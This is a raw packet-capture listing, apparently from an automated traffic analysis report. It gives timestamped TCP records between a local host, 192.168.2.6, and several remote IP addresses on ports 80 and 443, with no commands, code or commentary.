                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212450027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212465048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212480068 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212501049 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212523937 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212719917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212785959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212790966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212805986 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212821007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212833881 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212846994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212846994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212857008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212863922 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212873936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212898016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212898970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212898970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212914944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212915897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212932110 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212949038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212956905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212956905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212961912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.212975979 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.213017941 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215323925 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215353012 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215362072 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215388060 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215396881 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215403080 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215413094 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215440035 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215459108 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215459108 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.215485096 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217067957 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217077017 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217093945 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217149019 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217154980 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217170000 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.217196941 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.231334925 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.232426882 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.232460022 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.232677937 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.232882977 CET49974443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.232896090 CET44349974152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246438980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246454954 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246471882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246485949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246501923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246506929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246542931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246581078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246598005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246608019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246613026 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246629000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246640921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246644020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246660948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246675014 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246686935 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246686935 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246691942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246716022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246737003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246740103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246756077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246768951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246773005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246793985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246793985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246844053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246893883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246908903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246925116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246939898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.246967077 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247006893 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247411966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247426033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247442961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247472048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247535944 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247575045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247590065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247605085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247620106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247639894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247639894 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247649908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247665882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247672081 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247682095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247697115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247714043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247716904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247716904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247737885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247740030 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247752905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247769117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247790098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247790098 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247845888 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247903109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247917891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247960091 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247960091 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.247991085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248007059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248028040 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248042107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248070002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248105049 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248120070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248136997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248151064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248183966 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248238087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248296976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248312950 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248327971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248342991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248358011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248372078 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248373985 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248387098 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248399019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248399019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248431921 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248469114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248482943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248497963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248512030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248532057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248532057 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248567104 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248626947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248800039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248816013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248825073 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248831034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248847961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248862028 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248867989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248867989 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248878002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248903036 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.248941898 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.254914045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.254929066 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.254980087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.254980087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.286684036 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287204981 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287271976 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287283897 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287349939 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287659883 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287722111 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287802935 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287806034 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.287823915 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.288511992 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.288518906 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.289273024 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.289273024 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.289295912 CET4434996723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.289350033 CET49967443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292344093 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292344093 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292371035 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292659044 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292737961 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.292784929 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294282913 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294305086 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294388056 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294404984 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294414043 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.294461966 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.296221018 CET49963443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.296250105 CET4434996320.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.304023981 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.304056883 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.304121971 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.304141998 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.304172993 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305397034 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305407047 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305423021 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305433035 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305526018 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305541039 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305555105 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305588007 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305608034 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305615902 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.305628061 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306370974 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306427002 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306432009 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306444883 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306473017 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306473970 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.306516886 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.308985949 CET49960443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.309007883 CET4434996023.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.329874992 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.329899073 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.329965115 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.329983950 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.330672026 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.330722094 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.337498903 CET49957443192.168.2.620.75.60.91
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.337515116 CET4434995720.75.60.91192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377361059 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377384901 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377403975 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377429008 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377434015 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377492905 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.377504110 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380234003 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380250931 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380268097 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380284071 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380314112 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380325079 CET4434996413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.380366087 CET49964443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389023066 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389041901 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389115095 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389127016 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389374971 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.389429092 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.393054008 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.394325972 CET49966443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.394340038 CET4434996613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.399576902 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.399600029 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.399663925 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.400757074 CET49975443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.400769949 CET4434997513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.426975012 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.431818008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.444101095 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.444123030 CET44349976104.70.121.184192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.444350958 CET49976443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.444514990 CET49977443192.168.2.6104.70.121.184
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.444554090 CET44349977104.70.121.184192.168.2.6
